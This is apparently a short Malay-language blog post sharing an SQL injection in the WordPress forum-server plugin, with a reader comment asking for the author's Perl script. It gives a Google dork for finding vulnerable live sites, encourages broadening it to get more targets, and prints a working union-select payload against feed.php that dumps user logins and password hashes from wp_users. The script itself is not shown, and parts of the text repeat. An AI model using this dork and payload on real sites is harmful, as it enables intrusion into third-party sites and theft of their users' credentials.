Salam.. ni den nak kongsi satu sql injection bug kek Satu component wordpress. Maklumat ini adolah untuk tujuan pembelajaran sahajo. Segalo penyalahgunaan maklumat adalah atas tanggungjawap anda sendiri :)
Ok.. ni google dork untuk mencari site yang vulnerable. Dork ni bulih diubahsuai untuk mendapatkan lobih banyak target.
Dan ini adolah exploit code eh.
Ni contoh POC target yang mempunyai kelemahan yang dinyatokan kek eteh tu.
Ni pulak adolah perl script yang den buek untuk extract maklumat dari kelemahan sqli
Ok.. ni google dork untuk mencari site yang vulnerable. Dork ni bulih diubahsuai untuk mendapatkan lobih banyak target.
- inurl:"wp-content/plugins/forum-server/feed.php"
Dan ini adolah exploit code eh.
- feed.php?topic=1+union+select+group_concat(user_login,0x3a,user_pass)
- +from+wp_users--
Ni contoh POC target yang mempunyai kelemahan yang dinyatokan kek eteh tu.
Ni pulak adolah perl script yang den buek untuk extract maklumat dari kelemahan sqli
1 comments:
nak perl script tu boleh tak en ghimau?